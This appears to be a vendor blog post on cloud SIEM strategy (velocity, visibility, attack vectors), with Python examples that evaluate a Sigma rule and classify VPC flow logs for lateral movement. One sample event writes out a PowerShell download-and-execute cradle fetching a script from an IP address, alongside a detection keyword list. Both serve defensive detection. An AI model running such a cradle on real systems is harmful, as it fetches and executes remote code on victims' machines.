The widely publicized FireEye breach and the SolarWinds supply chain attack are a good occasion to reflect on a broader shift taking place across the industry: the move from legacy on-prem infrastructure to the cloud. When a sophisticated nation-state actor obtains tooling built for Red Team engagements, nefarious intent is all but assured, and it should give our community pause about how ready we collectively are to detect an attacker who turns such tools against us.
So what does a modern security analytics platform provide that helps defend critical assets in this continuously evolving threat landscape? As it relates to your SIEM, improving your organization's security posture is a complex problem that can be broken into three focus areas we will call Velocity, Visibility, and Vector.
The reality on the front lines is that SecOps teams and security analysts simply do not have time to track every evolving threat to an organization's critical assets. Technology stacks keep expanding with niche and cross-vendor solutions, and it becomes difficult to know which of the vulnerabilities in the latest headlines are relevant and what priority they deserve. Further, deploying patches and content packs with new detection rules and signatures consumes many operational hours. Fortunately, cloud-native SaaS solutions are providing much-needed relief. Solutions like Sumo Logic's Cloud SIEM Enterprise release new actionable content, in the form of correlation rules, to the customer environment several times a week on average. That means that as we discover new threats, we can deploy content globally to all customer environments, equipping them to detect those threats automatically. Writing SIEM correlation rules also requires specialized skill; because Sumo Logic supports community standards such as Sigma and YARA rules, customers can find and import rules already developed by industry experts rather than authoring everything themselves. As defenders, it is critical that we share intelligence and content freely, because if we don't, the adversary will always be one step ahead. In short, evaluate your current solution and consider:
- How are updates applied to the platform, and does applying them require operational effort on your side?
- At what regular cadence is new detection content released?
- What support does the solution offer for community-contributed content such as Sigma and YARA rules?
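To make "support for Sigma rules" concrete, here is an added example (not code from the original post or from Sumo Logic) that evaluates a Sigma-style detection rule against sample process-creation events. Sigma rules are written in YAML; the rule below is transcribed into a Python dict with the same structure as the YAML `detection` section so the example runs without a YAML library. The rule, the hypothetical `CorpUpdater.exe` whitelist, and the events are all constructed for this example, and only a subset of Sigma is implemented: `field|modifier` keys with `contains`, `startswith` and `endswith`, list values as OR, fields within a selection as AND, case-insensitive matching, and conditions built from selection names with `and`, `or` and `not` (no parentheses).

```python
"""Evaluate a Sigma-style detection rule against sample events (added example)."""

# Constructed rule: a hypothetical PowerShell download-cradle detection with a
# whitelist for a made-up corporate updater. This mirrors the structure of a
# Sigma YAML rule's "detection" section.
SIGMA_RULE = {
    "title": "PowerShell download cradle (constructed example)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-WebRequest", "DownloadFile"],
        },
        "filter": {"ParentImage|endswith": "\\CorpUpdater.exe"},  # hypothetical whitelist
        "condition": "selection and not filter",
    },
}

# Constructed process-creation events using Sysmon-like field names.
SAMPLE_EVENTS = [
    {"id": "evt-1",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".downloadstring('http://198.51.100.7/a.ps1')",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"},
    {"id": "evt-2",
     "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest https://updates.example.internal/pkg.zip -OutFile pkg.zip",
     "ParentImage": "C:\\Program Files\\Corp\\CorpUpdater.exe"},
    {"id": "evt-3",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c dir",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"id": "evt-4",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Get-Process",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _match_value(actual, pattern, modifier):
    """Sigma string matching is case-insensitive; apply the field modifier."""
    a, p = str(actual).lower(), str(pattern).lower()
    if modifier is None:
        return a == p
    if modifier == "contains":
        return p in a
    if modifier == "startswith":
        return a.startswith(p)
    if modifier == "endswith":
        return a.endswith(p)
    raise ValueError(f"unsupported Sigma modifier: {modifier}")


def _match_selection(selection, event):
    """All fields in a selection must match (AND); a list of values is an OR."""
    for key, patterns in selection.items():
        field, _, modifier = key.partition("|")
        if field not in event:
            return False
        if not isinstance(patterns, list):
            patterns = [patterns]
        if not any(_match_value(event[field], p, modifier or None) for p in patterns):
            return False
    return True


def _eval_condition(condition, results):
    """Evaluate 'a and not b or c' style conditions (not > and > or, no parentheses)."""
    def term(token):
        token = token.strip()
        if token.startswith("not "):
            return not term(token[4:])
        return results[token]
    return any(all(term(t) for t in clause.split(" and "))
               for clause in condition.split(" or "))


def evaluate_rule(rule, event):
    """Return True if the event satisfies the rule's detection condition."""
    detection = rule["detection"]
    results = {name: _match_selection(sel, event)
               for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"], results)


def matching_event_ids(rule, events):
    """IDs of all events that trigger the rule, in input order."""
    return [e["id"] for e in events if evaluate_rule(rule, e)]


if __name__ == "__main__":
    print(SIGMA_RULE["title"], "->", matching_event_ids(SIGMA_RULE, SAMPLE_EVENTS))
```

Note that `evt-1` matches even though its command line uses `downloadstring` in lower case, while `evt-2` is suppressed by the whitelist selection named in the `not filter` clause. A production SIEM does the same work by compiling the rule into its native query language; what the community standard buys you is that the rule, and the tuning expressed in its filter, can be written once and shared.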
Professor Patrick Wolf accurately stated, "the rate at which we're generating data is rapidly outpacing our ability to analyze it. The trick is to turn these massive data streams from a liability into a strength." Now that log analytics and security solutions have shifted to the cloud, organizations can finally keep pace with the rapid growth of the machine data they generate. Furthermore, they can scale elastically, not only in collection but in the compute power required to make sense of the data. As of October 2020, for example, Sumo Logic analyzes 1.6 quadrillion events on a cloud-scale analytics platform that scans an average of 873 petabytes of data every day, all without deploying any legacy on-prem hardware or infrastructure. The ability to search and visualize across data at that scale has been a game changer for organizations. Taken a step further, aggregate intelligence across all of our customers' data lets each of them compare the attacks against their enterprise with the cyber landscape at large. That perspective would not be possible without a modern, microservices-based, cloud-native architecture.
The last area to consider is the attack vectors being leveraged, and whether enough signal is being collected to identify cyber events across every part of the IT infrastructure. Specifically, as organizations move from on-prem to hybrid cloud and then to multi-cloud, can the security team defend all of these beachheads? For example, does the solution provide out-of-the-box content for traditional Windows infrastructure as well as Azure, AWS, and GCP? Does it allow deeper inspection of both North-South and East-West traffic between systems using open-source network analytics such as Bro/Zeek? Relying solely on firewall logs for network visibility leaves critical blind spots: East-West traffic between workloads in the same network segment never crosses the perimeter firewall, so it never appears in those logs. Note that Zeek needs a packet feed, which in a cloud VPC means a traffic-mirroring session or a virtual tap rather than a physical span port. At a bare minimum, support for newer data sources like Zeek, Kubernetes with Falco, AWS VPC flow logs, and AWS Network Firewall is a must-have. Combined, these bring the observability that helps modern security practitioners find the needle in a stack of needles before a breach occurs.
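As an added example of the East-West blind spot described above (this is not code from the original post or from Sumo Logic), the following script parses AWS VPC flow log records in the default version 2 field order, classifies each flow as North-South or East-West against a VPC CIDR, and flags accepted East-West TCP connections to ports commonly used for lateral movement. The VPC CIDR (`10.0.0.0/16`), the port watchlist, and the log lines are constructed for the example; the record layout follows the documented default flow log format. The internal/external decision is made against explicit CIDRs rather than Python's `ipaddress.is_private`, because that property also treats documentation ranges such as 203.0.113.0/24 as private.

```python
"""Classify VPC flow log records and flag East-West lateral-movement candidates (added example)."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed: the VPC's address space. Anything else is treated as external.
VPC_CIDRS = [ip_network("10.0.0.0/16")]

# Constructed watchlist of destination ports associated with lateral movement.
LATERAL_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM-TLS"}

# Default VPC flow log (version 2) field order.
FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()

# Constructed sample records (account and ENI IDs are placeholders).
SAMPLE_LINES = [
    "2 123456789010 eni-0a1b2c3d4e5f67890 10.0.1.12 10.0.2.33 49152 445 6 20 4249 1605000000 1605000060 ACCEPT OK",
    "2 123456789010 eni-0a1b2c3d4e5f67890 203.0.113.5 10.0.1.12 51000 443 6 10 1200 1605000000 1605000060 ACCEPT OK",
    "2 123456789010 eni-0a1b2c3d4e5f67890 10.0.1.12 203.0.113.9 52000 80 6 5 800 1605000000 1605000060 ACCEPT OK",
    "2 123456789010 eni-0a1b2c3d4e5f67890 10.0.1.12 10.0.3.8 49153 3389 6 30 6000 1605000000 1605000060 ACCEPT OK",
    "2 123456789010 eni-0a1b2c3d4e5f67890 10.0.1.12 10.0.2.33 49154 445 6 1 60 1605000000 1605000060 REJECT OK",
    "2 123456789010 eni-0a1b2c3d4e5f67890 - - - - - - - 1605000000 1605000060 - NODATA",
]


@dataclass
class FlowRecord:
    srcaddr: str
    dstaddr: str
    srcport: int
    dstport: int
    protocol: int
    action: str


def parse_flow_log(lines):
    """Parse version 2 flow log lines; skip malformed lines and NODATA/SKIPDATA records."""
    records = []
    for line in lines:
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        if rec["log_status"] != "OK":  # NODATA / SKIPDATA records carry no addresses
            continue
        records.append(FlowRecord(rec["srcaddr"], rec["dstaddr"], int(rec["srcport"]),
                                  int(rec["dstport"]), int(rec["protocol"]), rec["action"]))
    return records


def is_internal(addr):
    """True if the address falls inside one of the configured VPC CIDRs."""
    ip = ip_address(addr)
    return any(ip in net for net in VPC_CIDRS)


def classify(rec):
    """East-West when both endpoints are internal; otherwise North-South."""
    if is_internal(rec.srcaddr) and is_internal(rec.dstaddr):
        return "east-west"
    return "north-south"


def direction_summary(records):
    """Count flows per direction; East-West flows are the ones a perimeter firewall never logs."""
    summary = {"east-west": 0, "north-south": 0}
    for rec in records:
        summary[classify(rec)] += 1
    return summary


def lateral_movement_candidates(records):
    """Accepted East-West TCP flows to a watchlisted port: (src, dst, port, service)."""
    hits = []
    for rec in records:
        if (rec.action == "ACCEPT" and rec.protocol == 6
                and classify(rec) == "east-west" and rec.dstport in LATERAL_PORTS):
            hits.append((rec.srcaddr, rec.dstaddr, rec.dstport, LATERAL_PORTS[rec.dstport]))
    return hits


if __name__ == "__main__":
    recs = parse_flow_log(SAMPLE_LINES)
    print(direction_summary(recs))
    for hit in lateral_movement_candidates(recs):
        print("east-west %s -> %s:%d (%s)" % hit)
```

Of the five usable records, three are East-West and two of those are accepted connections to SMB and RDP from the same source host; a perimeter firewall would have logged none of them. The rejected SMB attempt is deliberately excluded from the candidate list but is still worth counting, since a burst of rejects from one host is its own signal. Flow logs give you the 5-tuple and byte counts only; a packet-level source such as Zeek is what tells you what was actually said on those connections.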
If you're looking to modernize your security stack for greater visibility and a shorter time to detection and response, we'd love to share how Sumo Logic can help with your security team's digital transformation.